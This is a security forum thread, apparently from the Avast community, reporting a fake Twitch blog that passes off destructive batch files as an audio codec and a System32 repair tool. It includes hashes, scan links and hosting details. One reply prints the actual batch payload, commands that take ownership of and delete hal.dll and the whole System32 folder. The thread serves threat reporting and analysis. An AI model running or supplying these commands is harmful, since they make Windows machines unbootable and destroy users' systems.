Fake Twitch Blog with System32 Malware. [Only 1 vendor currently blocks site]

[REDACTED]

Hi Avast Community,

I wanted to report in the open an active threat that's currently not being monitored by any internet security services.

Many Thanks to the reddit twitch community for pointing out this site.

Update:Note the site in question has a strikethought to prevent people from visiting the sites in question, It's recommended that you do not visit any of the sites in question as the virus/bat seems to be a really nasty piece of malware that is taking over system32 and removing/tampering with boot files. (Thanks agian to the community for the analysis.)


Brief
The site in question is called '{domain}/blog' and '{domain}/audiofix/', a hacker seems to have scrapped the twitch.tv/blog site which is hosted with WPEngine (A firm which uses Linode servers and not Amazon EC2 instances). The site's owner claims to provide a "brand new audio codec" by downloading an zip file containing a bat file. In addition the main stepte.ch site also includes a "system32 repairing tool" which also is a windows bat file that deletes system32. In addition the person is claiming to be "Helper of Twitch. Lead Webmaster. Sound Engineer" which is completely incorrect.

In addition the root site '{domain}' also has a system32 virus remover, Here's a virustotal scan of that bat executable.
https://www.virustotal.com/en/file/fbf640ae0bd0da2c4101034df918910c31617a7b31d603b7900df13d67883937/analysis/1424955640/
and a Malwr scan: https://malwr.com/analysis/ZjkxMWVkMGVjOWY1NDkwMmExZjlmMzgxMDllOGVjNzM/
SHA256: fbf640ae0bd0da2c4101034df918910c31617a7b31d603b7900df13d67883937
MD5:  9cf75d716f6b698b5433db6bad4a2877


File Analysis
Here's a Malwr analysis of the .bat file. https://malwr.com/analysis/MWEyZTM2M2YzNTU1NGExMDkxNzkxOTgwYTk5MTU3NWY/
Here's the Virustotal analysis of the .bat file. https://www.virustotal.com/en/file/29c50017317cc6c79b1e6ab03e36f5b75780fdbf059615396d3a19625f35676e/analysis/1424954933/
MD5: 0535ba5eb8dbbd884a5429c5f87b810d
SHA 256: 29c50017317cc6c79b1e6ab03e36f5b75780fdbf059615396d3a19625f35676e
Only 1 anti-virus vendor has picked up that the file is harmfull, Upon decompression the file loads as a bat file.

Here's a file take from the virtual machine at malwr showing that the bat file is removing system32. http://i.imgur.com/cjWoaoD.jpg


Domain and Host Analysis
The domain in question is registered with GoDaddy using Domain Privacy Protection. The domain was registered on 2015-02-10, The site's active DNS servers are GoDaddy defaults ns41.domaincontrol.com and ns42.domaincontrol.com

The site is being hosted at {IP} (Amazon Web Services) on an EC2 instance in US West. ASN Block: AS16509 if anyone is interested :-)


 

[Pondus]

scanning zip file dont give correct file info .... MD5 and all other info will be for the zip and not the file inside
so to get correct info unzip and scan the file inside

[REDACTED]

Hi Pondus,

Sorry about that, Fixing this now! :-)

[!Donovan]

Confirming this.

[polonus]

Hi !Donovan,

They, the guys from Qihoo-360, that detect the FP - virus.bat.danger.gen - even advise to scan in Safe Mode to kill the alleged malcode and then when to no avail eventually re-format the HD. 
是什么意思 = What does this mean? Shooting with elephant ammo unto a midget 
First we check whether there is a real threat.

polonus

[REDACTED]

Hi !Donovan,

They, the guys from Qihoo-360, that detect the FP - virus.bat.danger.gen - even advise to scan in Safe Mode to kill the alleged malcode and then when to no avail eventually re-format the HD. 
是什么意思 = What does this mean? Shooting with elephant ammo unto a midget 
First we check whether there is a real threat.

polonus

Hi Polonus,

I believe the scripts are being used by trolls on Twitch.tv on the unsuspecting public. There have been many recent organised "raids" that are twitch viewers telling broadcasters that there computer has a virus or is broken. they are sending people to this site to download the so called "fix" only to find that the script deletes system32. It's an old troll trick but the site in question looks legit. The fact that the malware publisher scrapped the twitch.tv/blog site for there own fake blog is telling that they understand web technologies pretty well.

Proof of such claims: http://www.reddit.com/r/Twitch/comments/2x4wzj/dangerous_page_faking_twitch_blog_page_please_read/
and Videos: https://www.youtube.com/watch?v=WnfrSIPxb_4 (this is a manual social engineering style of attack. Nothing script side thought, this is the first time i've seen malware being created just for deleting system 32 aimed at twitch users.)

Thanks
Oliver

[polonus]

Hi Oliver,

Best reaction to such trolls is never to react and make the troll feel bored.
Banning them without further ado and comment is very effective.

Damian

[REDACTED]

Hi Oliver,

Best reaction to such trolls is never to react and make the troll feel bored.
Banning them without further ado and comment is very effective.

Damian

I agree! Infact theres many awesome IRC bots that filter out bad traffic. MooBot and Nightbot are great tools for getting rid of URLs from the livestream however some are very new to livestreaming and are pretty vunrable. More education is needed to educate people about the risks of livestreaming.

[polonus]

Hi Oliver,

And those into it should be aware that it is being frowned upon especially by old content media:
news/is-live-streaming-your-premiere-680201

Damian

[REDACTED]

Quick update.

A enterpise security vendor has now listed the site as containing malware. I have supplied them with samples of the files too, I've also sent reports to a larger OEM enterprise vendor to get the site added to there blacklists as well.

[!Donovan]

Thanks for the update; glad to see detections are being added.

~!Donovan

[Michael (alan1998)]

Nasty thing, taking ownership of System32. Ouch

Code: [Select]

takeown /f "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1 && icacls "%systemdrive%\Windows\System32\hal.dll" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1
takeown /f "%systemdrive%\Windows\System32" /r /d y >nul 2>&1
icacls "%systemdrive%\Windows\System32" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32" >nul 2>&1
rmdir /s/q "%systemdrive%\Windows\System32" >nul 2>&1


Not only System32, but Hal.dll! WHAT!? Seriously? That's freaking dangerous!

Edit: Take a look at this!

Code: [Select]

takeown /f "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1 && icacls "%systemdrive%\Windows\System32\hal.dll" /grant administrators:F /t >nul 2>&1
del /f/s/q "%systemdrive%\Windows\System32\hal.dll" >nul 2>&1

Hall.dll is MANDATORY for reboot. This would completely destroy your system using just that line of code, with Admin Permissions! Deadly little file!

[!Donovan]

Thanks for the analysis Michael. I didn't know about hal.dll.


This is a good example of a program that does completely the opposite of what it's expected to do.

[Michael (alan1998)]

If you ever boot into Safe Mode using Windows. Hal.dll is always listed.

The Takeown and Del are Self Explanatory. Essentially, what is is doing is using something very close to |TakeOwnership.reg. It takes the file over for that User, and then that user can do whatever they want to.

Del is to Delete the file.

This is certainly a very very nasty file. And, it's extremely small. Making it suitable for those even on Dial Up (Whoever is still)

[polonus]

Hi !Donovan,

The hal.dll file is a hidden file that is used by Windows 7 to communicate with your computer's hardware.

hal.dll is a legit file and can create BSODS on errors and when missing, your machine may fail to start at all, virus interaction is also know: http://repairshala.weebly.com/c-virus-program-to-delete-haldll-file-and-shutdown-the-system.html
(two virus proggies in C++ in this link).
See: https://neosmart.net/wiki/hal-dll-missing-corrupt/

polonus